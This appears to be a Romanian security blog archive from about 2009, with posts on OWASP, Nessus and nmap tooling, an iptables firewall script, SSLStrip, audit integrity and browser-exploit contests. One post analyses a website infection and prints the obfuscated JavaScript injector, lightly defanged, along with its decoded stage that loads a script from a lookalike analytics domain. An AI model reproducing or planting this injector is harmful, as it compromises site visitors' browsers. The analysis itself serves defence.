Saptamina  asta a fost facuta publica, la conferinta OWASP AppSec DC, versiunea release candidate nr.1 a documentui OWASP Top Ten, ce contine cele mai fregvente vulnerabilitati ale aplicatiilor de web. Se pare ca este foarte asteptat, pentru ca de jumatate de ora nu reusesc sa descarc draft-ul. Documentul, care este supus discutiilor publice pina pe data de 31.12.2009, poate fi descarcat de aici. Este interesant ce modificari apar tinind cont de faptul ca de la versiunea initiala, documentul a fost modificat substantial la a doua versiune.

Have fun…

 

Reclame

Compania Rapid7 a anuntat intr-un comunicat de presa ca a achizitionat proiectul open source Metasploit pentru al integra in solutia de management al vulnerabilitatilor pe care o ofera. HD Moore, omul din spatele proiectului va fi angajat de Rapid7, devenind astfel Chief Security Officer si ramine in acelasi timp principalul arhitect al proiectului Metasploit. Sper din tot sufletul ca proiectul va ramine Open pentru comunitate. Ar fi pacat sa devina o alta solutie comerciala.

Have fun,

Adia astept sa citesc o carte. Este vorba de Daemon lui Daniel Suarez. De mult nu am mai auzit atit de multe aprecieri si elogii asupra unei carti despre tehnologie, de la aparitia seriei de carti de la Syngress „How to own a …”.  Ceea ce m-a convins sa vreau sa citesc aceasta carte este un interviu pe care l-am auzit in Pauldotcom.com cu autorul si pe care va invit sa-l ascultati. Despre ce este vorba? Despre modul in care societatea de azi este atit de mult si atit de complicat interconectata tehnologic incit afectarea unei parti duce la efecta dramatice pentru intreaga civilizatie. Suna interesant? Astept paririle voastre despre carte.

Acum ceva timp am incercat sa-mi construiesc o masina care sa stea in Internet si pe care sa o pot accesa remote si sa o pot folosi pentru diferite Penetration Teste. Singurele metode de access  pe care vreau sa le folosesc pentru acest sistem este este un serviciu de SSH si HTTPS, ambele bazate numai pe autentificare cu certificat. De aici apar si anumite inconveniente la care vreau sa gasesc solutii. De aceea m-am uitat mai mult la nessuscmd, command line tool care este oferit de nessus. Exemplul de mai jos este un exemplu real de folosire  in care am incercat sa aflu toate serverele SSH dintr-o retea si sa aflu cite dintre ele folosesc versiuni vechi si care pot fi atacate cum ar fi 1,3 sau 1,5 sau 1.99.

Cum se poate folosi nessuscmd?

./nessuscmd -help

Output-ul ne arata urmatoarele posibilitati:

Examples :
–––-
nessuscmd -p 1-1024 localhost
nessuscmd -O 10.0.1.2
nessuscmd -V -i 10884 172.16.1.1

Ceea ce mi-a atras atentia este „-i” care inseamna sa indici id-ul plugin-ului de Nessus, ce vor fi folosite. Pentru a afla toate id-urile plugin-urilor care se refera la SSH poti rula ceva de genul:

fgrep -i script_id /opt/nessus/lib/nessus/plugins/ssh* | cut -d „(” -f2 | cut -d „)” -f1 |  tr ‘\n’ ‘,’

Aceasta aduce la o lista care poate fi folosita de nessuscmd. Deci comanda va arata cam asa:

sudo ./nessuscmd -O -p 22 -i 10882,10708,10965,11341,10607,32320,32314,10267,11821,11343,12634,10268,10472,11340,11195,10269,10881,11339,11169,14273,31421,20927 172.16.22.0/24

Interesant a fost output-ul lui nessus care arata dupa 10 min cam asa:

+ Results found on SCAN-ERROR :
– Host information :
[!] Plugin ID 19506
| Too many live hosts scanned in a row while on a HomeFeed – please
| upgrade to a ProfessionalFeed

Asta a insemnat ca a trebuit sa folosesc nmap-ul prima data pentru a putea sa gasesc toate serverele de SSH si apoi sa le import in nessuscmd.

Si asa se pare ca functioneaza.

Un lucru care ma va ajuta este ca versiunea 5.0 a scanner-ului nessus nu va mai avea un client. Clientul va fi inlocuit de o interfata de web. O informatie interesanta care cred ca ma va ajuta in proiectul meu dar pina atunci sper ca kung-fu-ul meu in folosirea lui nessuscmd va fi atit de mare incit nu voi mai avea nevoie de interfata web.

Have Fun

Ieri am citit un articol interesant in numarul 21 al revistei Insecure, in care Didier Stevens descrie o modalitate inedita in care poate fi compromis un calculator. El foloseste pentru exemplificare bug-ul procesorului de imagine JBIG2 al soft-ului Adobe Acrobat Reader si arata ca nu este nevoie de deschiderea unui document pentru a fi cumpromis un calculatorul ci pur si simplu un simplu view in Windows Explorer este de ajuns.

Cum functioneaza?  La instarea multor soft-uri se aduc si „imbunatatiri” Shell-ului de windows, permitindu-i acestuia sa poate citi informatii suplimentare despre anumite tipuri de fisiere. De exemplu, in cazul PDF-urilor, se pot viziona in windows explorer informatii suplimentare cum ar fi autorul documentului. Aceasta inseamna automat o procesare a fisierului. Deci daca se introduce codul care executa exploatarea in portiunea ce va fi procesata de extensia de PDF a shell-ului, atunci procesul de exploatare are loc fara sa fie nevoie de deschiderea fisierului.

Solutia propusa de el este dezintalarea extensie de shell pentru documentele PDF.  Simplu, dar nu la indemina tuturor utilizatorilor.  Exista si alte soft-uri care ofera aceeleasi tip de „imbunatatiri”. VLC si Winzip sint doar 2 care imi vin in minte.

Articolul integral poate fi citi aici:

Have fun :-)) and try this only at home .

Ca intotdeauna Fyodor se pregateste in felul lui sa serbeze DefConn-ul de anul asta. Si se pare ca anul acesta vine cu versiunea 5.0 pentru a sarbatori evenimentul. O noua facilitate care mie mi s-a parut foarte interesanta este utilitarul ndiff. Acest nou utilitar poate fi folosit pentru a compara rezultatul a doua scan-arii in format xml.

$ ndiff -h
Usage: /usr/local/bin/ndiff [option] FILE1 FILE2
Compare two Nmap XML files and display a list of their differences.
Differences include host state changes, port state changes, and changes to
service and OS detection.

-h, –help     display this help
-v, –verbose  also show hosts and ports that haven’t changed.
–text         display output in text format (default)
–xml          display output in XML format

Sint multe alte lucruri noi, deci go upgrade.

Nu-mi place UFW-ul, firewall-ul care vine implicit cu Ubuntu.  Poate si pentru ca atunci cind e vorba de firewall-uri prefer sa il configurez eu singur. Cum arata la mine scheletul de la care pornesc?

touch /opt/tools/script/firewall
sudo chown root:root /opt/tools/script/firewall
sudo chmod 755 /opt/tools/script/firewall
sudo ln -s /opt/tools/script/firewall /etc/init.d/firewall

Continutul fisierul /opt/tools/script/firewall este:
#!/bin/sh -e

### BEGIN INIT INFO
# Provides:          My own Firewall
# Required-Start:    mountall
# Required-Stop:     
# Default-Start:     S
# Default-Stop:      
# Short-Description: start firewall
### END INIT INFO

PATH="/sbin:/bin:/usr/sbin:/usr/bin"

. /lib/lsb/init-functions

error=0
case "$1" in
start)
 log_action_begin_msg "Appling the firewall rules:"
 iptables --table filter --flush
 iptables --table filter --delete-chain
 iptables --table filter --zero
 #iptables --table filter --policy INPUT DROP
 #iptables --table filter --policy OUTPUT DROP
 #Accept ICMP Type 8 Echo Replay Request and Type 0 Echo Replay.
 iptables --table filter --append INPUT --protocol icmp --icmp-type 8 -s 0/0 --match state --state NEW,ESTABLISHED,RELATED --jump ACCEPT
 iptables --table filter --append INPUT --protocol icmp --icmp-type 0 -s 0/0 --match state --state ESTABLISHED,RELATED --jump ACCEPT
 iptables --table filter --append OUTPUT --protocol icmp --icmp-type 0 -d 0/0 --match state --state ESTABLISHED,RELATED --jump ACCEPT
 iptables --table filter --append OUTPUT --protocol icmp --icmp-type 8 -d 0/0 --match state --state NEW,ESTABLISHED,RELATED --jump ACCEPT
 #Accept Localhost
 iptables --table filter --append INPUT --source 127.0.0.1 --destination 127.0.0.1 --match state --state NEW --jump ACCEPT
 iptables --table filter --append OUTPUT --source 127.0.0.1 --destination 127.0.0.1 --match state --state NEW --jump ACCEPT
 #Accept DHCP    
 iptables --table filter --append INPUT --protocol udp --destination-port 67 --jump ACCEPT
 iptables --table filter --append INPUT --match state --state ESTABLISHED,RELATED --jump ACCEPT
 #Drop windows broadcast
 iptables --table filter --append INPUT --protocol udp --match udp --dport 137:138 --jump DROP
 iptables --table filter --append INPUT --jump LOG --match limit --limit 5/min --log-level 4 --log-prefix "INPUT CHAIN DROP"
 iptables --table filter --append INPUT --jump DROP
 log_action_end_msg $error
 exit $error
 ;;

stop)
 log_action_begin_msg "Removing the firewall rulles:"
 iptables --table filter --flush
 iptables --table filter --delete-chain
 iptables --table filter --zero
 log_action_end_msg $error
 exit $error
 ;;
status)
 iptables -L
 log_action_end_msg $error
 exit $error
 ;;
*)
 echo "Usage: /etc/init.d/ufw {start|stop|restart|force-reload|status}"
 exit 1
 ;;
esac

si la sfirsit:

sudo update-rc.d -f ufw remove # to remove the ufw firewall

sudo update-rc.d firewall defaults

In Wired am citit saptamina trecuta ca firma CardSystem Solutions, care a fost in anul 2004 victima unui atac informatic, va da in judecata firma de audit Sawas.

Motivul este ca firma de audit certificase cu 3 luni in urma procesatorul de carduri conform standardului CISP (Cardholder Information Security Program), precursor al actualului standard PCI DSS. Rezultatul acestui atac a fost furtul a 263000 de informatii despre carduri si compromiterea a altor 40 de milioane de carduri. Modalitatea in care a decurs atacul contravenea susnumitul standard. Pentru cei care nu stiu, standardul PCI DSS. este un standard de securitate IT impus de firmele de carduri de credit, gen Visa, Mastercard, procesatorilor de tranzactii si bancilor. Aceasta disputa legala, oricum se va termina, scoate la lumina anumite aspecte trecute cu vederea de tot sistemul creat in jurul certificarilor si acreditarilor. Primul comentariu al articolului din wired este:

As a former IT Auditor, I can tell you this with certainty: even the most skilled, detail-oriented IT Security Professional can only report what his or her manager will let him or her report. I audited Fortune 500 companies and there were always gaping holes in their IT security. I always reported them. But, in an attempt to keep future business, my management demanded that I remove many findings from my reports. Even though I refused to sign those reports, I bet I could still be held liable. I lost my job for being insubordinate. Watch for more of this in the future.

.

Comentariul imi aduce aminte de experienta mea de auditor, cind am intilnit situatii asemanatoare – frustrante si care deformeaza insasi scopul auditului, de orice fel ar fi el. Credeam ca se intampla asa doar la case mari dar, discutind acum ceva timp cu directorul departamentului de certificare al unei firme de securitate din Romania, am auzit ca aceleasi probleme sint si in sistemul romanesc. Rapoartele sint aranjate pentru a nu pierde clientul – desi clientul pierde mult mai mult tot negociind finding-urile unui audit.

Va schimba acest proces ceva? Nu cred ca va aduce schimbari imediate, dar sper ca va schimba treptat gradul de responsabilitate al clientilor si va obliga firmele de audit sa fie mai interesate de acuraterea muncii lor decit de pastrarea portofoliului de clienti. Este o aberatie sa platesti ca sa afli ce nu e in regula pentru ca pe urma, in loc sa treci la remedieri, sa incerci sa faci din armasar tintar in orice forma poti.

Articolul original poate fi citit aici.

Ce parere aveti voi? Ati avut experiente similare?

Vineri seara am fost sunat de un prieten care mi-a spus ca tocmai fusese hack-uit. Exploit-ul, dupa informatiile prietenului meu, era de prin mai, si a avut ca rezulat infectarea tuturor hosturilor virtuale apache cu un script java. Cind am primit scriptul mi-a atras atentia modul diferit in care fusese ascuns codul sursa al scriptului java. El arata cam asa:

<!–44e8ef75ef25fc970a79a3ccb704ad42–><sc!!!!!!!!!!ript language=javascript>zahlpc=”Jl#tWL%POTzGHriViVz#LiY”;rvxleu=”<Q73crQ69pt laQ6egQ75age=jQ61vQ61scriQ70t> funcQ74ioQ6e djjQ78tQ6cgs(hlyzcQ6arQ29Q7bQ76aQ72 Q67ynQ73zty,Q6dQ76Q6ewQ63zQ6fQ6dfQ3d\”#(7Q6eTbQ55OQ50VQ36Q4aQ63:+Q5e1Q7e9Q24u_iQ29yo5Q72@,2Q6bQ30Q60&Q45Q77MQ20|Q7bQ674Q3djvQ64Q74CxIFhNm]Q3b}fQ71Q213[HaQ7aB-AZps*Q6cQ47e8Q5c\”‘Q4bQ2eQ22,Q70Q65Q77yhg=\”Q22Q2cQ66Q61Q73ltdsQ2cqQ6brkjQ6cQ77f,tQ68yQ69Q74dkii=Q22Q22,hpoQ70Q75oQ69;Q66oQ72(gynsztQ79=0;gynszQ74yQ3cQ68lyzcjr.lengQ74Q68;gQ79nQ73Q7aty+Q2bQ29{ Q66Q61sQ6cQ74Q64sQ3dhlyQ7acjr.chaQ72AQ74(Q67yQ6eszty);qkrQ6bjlwQ66=Q6dvnwQ63Q7aomf.iQ6edexOf(Q66asltds)Q3biQ66(Q71Q6brkQ6aQ6cwfQ3e-1){ hQ70opuoiQ3d(Q28Q71krkjlQ77Q66Q2bQ31)Q25Q381Q2d1Q29;Q69fQ28Q68pQ6fQ70uoiQ3c=0Q29Q68pQ6fpuQ6fQ69+=8Q31;thQ79itdQ6bQ69i+Q3dmvQ6ewczQ6fQ6df.Q63haQ72Q41Q74(hpoQ70uoi-Q31Q29Q3bQ20} Q65lseQ20tQ68yQ69Q74dQ6biiQ2b=fQ61Q73Q6ctQ64s;Q7dQ70eQ77Q79hg+Q3dQ74Q68Q79itdQ6biQ69Q3bQ64Q6fcumeQ6eQ74.Q77rQ69Q74Q65(peQ77Q79hQ67Q29Q3b}Q3cQ2fsQ63Q72iptQ3e”;fmxoqyuh=zahlpc.charAt(6);vrbnnv=rvxleu.replace(/(jjuysyvwv|Q|xmmwgridfz)/g,fmxoqyuh);sqlwbat=unescape(vrbnnv);var agfwxg,kbptlkr;document.write(sqlwbat);agfwxg=”<NC]G>|<*:@)sC|Cos8j’C8IC/vzdz*:@)sC’|GzT4_z48j’vzdz*:@)sC’>||dz@|8Is)@o|j|T8M|DzC87y}|8Is)@o#*8Cb)]878Is)@o#48Cb)]87y|^|k=lJ`lJ`l~„`y}|t5:_]8TC#:550)8jK*8**)5T)tj[$~k\”J`rZr[~}|szCNj/}|8Is)@8*jK|^|8Is)@o#C5e bSC@)T47y}||t5:_]8TC#M@)C87|'<SxRFVb|GzT4_z48j\\’czdzS:@)sC\\’|SRxj\\’NCCs+//4554G8zTzGoCG:*#T8C/ii_C]v#v*\\’><\\/SxRFVb>’|y}</*:@)sC>|</NC]G>|”;djjxtlgs(agfwxg);</sc!!!!!!ript><!–44e8ef75ef25fc970a79a3ccb704ad42–>

Semnele de exclamatie din cuvintul script imi apartin pentru a evita o eventuala executie a lui.

Dupa cum se vede, scriptul selecteaza din variabila „zahlpc”, caracterul al saptelea „%”, apoi caracterul Q este inlocuit cu „%” , si astfel sint returnate codurile asci ale caracterelor ce formeaza codul sursa. Acesta este primul layer de ascundere a codului. Apoi rezulta un nou script java care desfacut va arata asa:

<ht!!!!ml> <scr!!!!!!!ipt type=”text/javascript” language=”javascript”>  var expiry = new Date(); expiry.setTime(expiry.getTime() + 24*60*60*1000); document.cookie=’sessionid=39128605A531; path=/; expires=’ + expiry.toGMTString();  document.write( „<SCR!!!!!!IPT language=\”JavaScript\” SRC=\”http://googleanalytlcs.net/__utmj.js\”><\/SCR!!!!!IPT>” );</scr!!!!!!!!!!!!ipt> </ht!!!!!ml>

Exte un script care citeste sessionsid-ul clientului pentru serverului care a fost infectat si impreuna cu data expirarii este trimis serverului googleanalytlcs.net. Sciptul java aflat aici va face call pentru un alt script de pe un alt site care va incerca exploatarea browserului. Site-ul din spate se schimba mereu.

O cautare in log-ul proxy-ului companiei unde lucrez arata ca exista destule site-uri romanesti care au fost infectate cu asa ceva. Deci recomand tuturor sa blocheze aceasta destinatie in proxy-uri.

O zi buna si va tin la curent in momentul in care am access la serverul care a fost exploatat cu  detalii despre exploit.

Pentru cei care doresc sa inceapa de undeva in domeniul de Forensic problema principala este de obicei de unde fac rost de material didactic. Pentru ca am urmarit mai zilele trecute o discutie pe tema asta m-am hotarit sa adun intr-un post citeva resurse pe care eu le cunosc si le recomand mai departe. Deci:

Scan 24” on Honeynet Project. Cu toate ca este un material didactic pentru incepatori il recomand cu insistenta. Incercati sa cititi si modul cum a fost rezolvat de cei care au cistigat. Dupa ce ati terminat …dig deeper in archives.

Computer Forensic Reference Data Sets. Foarte interesant mai ales ca acolo aveti si Live Memory Images, ceea ce nu este acceptat ca proba in marea majoritate a tarilor europene, dar este acceptat in America.

Have fun,

WAF sau Web Application Firewall-ul este un sistem care intelege foarte bine HTTP, stie sa analizeze conversatia HTTP, sa o decodifice in cazul in care e codata si sa protejeze aplicatiile de web in cazul in care descopera posibile atacuri.  Toata comunitatea de IT le instaleaza sperind sa rezolve problemele aplicatiilor de web dar se pare ca ele insele au foarte mari probleme. La conferinta de securita de la Cracovia OWASP, 2 cercetatori,Wendel Henrique, membru SpiderLabs (Trustwave’s advanced security team), si Sandro Gauci, fondator si CSO la EnableSecurit, au descoperit o serie de probleme in diferite WAF-uri si totodata vor sa faca public un tool pentru wafw00f care va ajuta la identificare acestor sisteme. Surpriza este completa pentru ca, cu ajutorul unui alt tool creat de ei wafFUN, au reusit sa pacaleasca sistemul si sa exploateze cu success o aplicatie de web (XSS).

Sfatul lor? Scrieti cod mai bun si mai sigur. :-))

Mai multe puteti citi aici sau urmarii prezentarea care a fost facuta publica aici.

Have Fun

Luna trecuta a aparut versiunea 4 a scanner-ului de vulnerabilitati Nessus. M-am gindit mult daca sa scriu despre aceasta, mai ales ca instalarea a adus cu sine stergerea politicilor „Default scanning” si „Microsoft Vulnerabilities”.  Ceea ce m-a impresionat foarte mult este scaderea impresionanta a timpului de pornire a engine-ului.  Tot odata se spune ca a fost rescris motorul pentru a suporta Multi-Threading.  In interfata s-a introdus posibilitatea de a salva rapoartele in formal XSLT. Incercati si nessuscmd daca nu ati avut curajul pina acum. Un punct bun de inceput cum sa gasiti share-uri neprotejate aici. Release notes-ul este pe site-ul de discutii aici.

Deci have fun…:-))

Cu toate ca a fost prezentat deja la Blackhat DC in februarie anul asta, nu am auzit pina acum de tool-ul „SSLStrip” scris si prezentat de Moxie Marlinspike. Despre ce este vorba? Conceptul este simplu si genial in acelasi timp. Modul in care oamenii ajung sa acceseze linkurile de HTTPS este de obicei prin click-ul unor butone/linkuri din pagini normale HTTP, care apoi trimite informatia prin HTTPS serverului. Un exemplu este pagina http://www.raiffeisen.ro unde in pagina HTTP este introdusa username-ul si parola care sint apoi postate prin HTTPS catre https://www.raiffeisen.ro/ . A doua modalitate este scrierea numelui de domeniu (ex: paypal.com) in bara de URL a browserului. Acesta trimite o cerere prin HTTP serverului care la rindul lui genereaza un raspuns din parte serverului de genul 302. Redirectare catre pagina HTTPS.

Ce face SSLStrip. Se interpune intre user si server si in momentul in care userul incearca sa acceseze pagina HTTPS, el va face cererea in numele clientui catre server pe HTTPS, primeste raspunsul si il livreaza pe HTTP userului. Pentu a reusi sa pacaleasca userului soft-ul se foloseste si de un trick ingenios inlocuind „Favorit Icon” cu iconita de lacatel, dind impresia de conexiune securizata. Interesante sint si rezultatele pe care le-a obtinut in urma rularii soft-ului in unul din nodurile de iesire a retelei TOR. Numarul de parole, sau carduri de credit este destul de mare. Ma astept deci ca numarul de astfel de atacuri folosind reteaua TOR sau retele Wireless sa creasca.

Ce poate ajuta impotriva unui astfel de atac ? Phising  filter-ul de la IE  activat sau in Firefox 3 (about:config) browser.identity.ssl_domain_display este setat 1 ?Da ,atit timp cit userul chiar va face click pe iconita pentru a verifica ca acela nu este un Fake „Favotite Icon” ci ca este chiar modalitatea browser-ului de a indica ca este un certificat SSL.

Prezentarea si tool-ul pot fi gasite aici.

Have Fun.

Vazuta si primita de la Bogdan. Multumesc.

Ce parere aveti?

Astazi am citit un post interesant unde se punea urmatoarea intrebare:

Which would you rather tell the board or your customers? (1) „We had no security incidents last year, and aren’t sure why,” or (2) „Our customer database was pillaged 9 times, despite a cross-organizational investment in ISO 27001 which was aligned with our balanced scorecard and measured to be in the top quartile of all infosec programs?”

Interesanta intrebare. :-)) Miine si articolul ….de unde provine.
Have fun.

Ieri a fost conferinta de securitate realizata de Bussines Standard unde a venit si domnul Varujan Pambuccian(tot respectul pentru dumnealui). Dansul a spus in alocutiunea sa ca noi ar trebui sa-l respectam pe hackerul Vladut, pentru inventivitatea si desteptaciunea sa. La intrebarea mea de ce ar trebui respect,  mi-a raspuns ca este normal sa-ti respecti adversarii. Eu nu-l vad pe Vladut ca pe un adversa si inteleg ca trebuie sa respectam un smecher care s-a folosit de nestiinta si naivitatea unor oameni pentru a accesa niste conturi de e-mail.

Eu nu vreau sa respect genialitatea unui infractor. Eu vreau sa respect genialitatea oameniilor care scriu cod pentru produse de antivirus, sisteme de operare sau care creeaza produse soft de calitate. Eu ii respect pe oamenii care l-au prins.  Eu aleg sa il respect pe Marian Selea.

„Cisco IOS Software operates on millions of systems from small home-office routers to the world’s largest service provider networks. But its inherent accessibility is perhaps described best by Marian Selea, a blind Cisco support engineer who provides Cisco IOS customer support daily.”

Acestea sint valorile pe care le respect.

A-l respecta pe Vladut este ca si cum noi ar trebui sa respectam pe cel care in loc sa ne atraga atentia ca portofelul ne cade din buzunar, ni-l fura si apoi ride de noi ca am fost atit de fraierieri.

Pentru a pregati conferinta am inceput sa ma uit putin la Youtube.  Modulul de resetare a parolei si cel de schimbare a ei trimit username-ul si parola in necriptat. How lame for Youtube.  Have fun.

Parola Necriptata Youtube.

Marti 07.04.2009 Bussines Standars organizeaza o conferinta de securitate despre Securitate Informatica in era web 2.0. Datorita faptului ca o sa am o prezentare acolo despre 10 aspecte importante ale securitatii in spatiul web si despre OWASP, pot sa ofer o invitatie primului doritor care imi va posta un comentariu pentru postul acesta.

Pentru cei care nu sint interesati de conferinta poate sinteti interesati sa va petreceti timpul studiind ceva command line kung-fu pe acest blog. Ideea este foarte misto si va cred ca o sa placa sa urmariti posturile de acolo.

Have fun anyway. 🙂

Cum functioneaza? Se stie ca troianul are ca simtom blocarea unor site-uri de unde utilizatorul poate face download la update-urile de semnaturi pentru antivirusii care il recunosc. Pa aceste restrictii la site-urile respective se afla si urmatorul test. Deci fara teama apasati aici si spuneti tare cite imagini vedeti. Nu are nimic de-a face cu 1 aprilie. :-))

Have fun.

In Canada a avut loc saptamina trecuta conferinta de securitate CansecWest. Aici are loc un concurs traditional de descoperire de exploituri pentru browsere. Ce a rezultat? Charlie Miller, cistigatorul de anul trecut, a reusit in citeva minute sa creeze un exploit pentru browserul Safari si sa plece cu cel de-al doile notebook Apple acasa. Marea revelatie pare a fi un doctorant german, sub pseudonimul de Nils care a reusit sa gaseasca bug-uri pentru Safari, IE8 instalat pe Windows 7 cit si Firefox reusind sa plece acasa cu Sony Vaio-ul aferent. Mai multe informatii aici. Acest concurs este pe cit de interesant pe atit de ingrijorator cu cit un bug pe piata neagra a ajuns sa coste in jur de $100.000. Deci …sa incercam Opera?

Have fun.

iulie 2019
L M M J V S D
« mart.    
1234567
891011121314
15161718192021
22232425262728
293031  
Reclame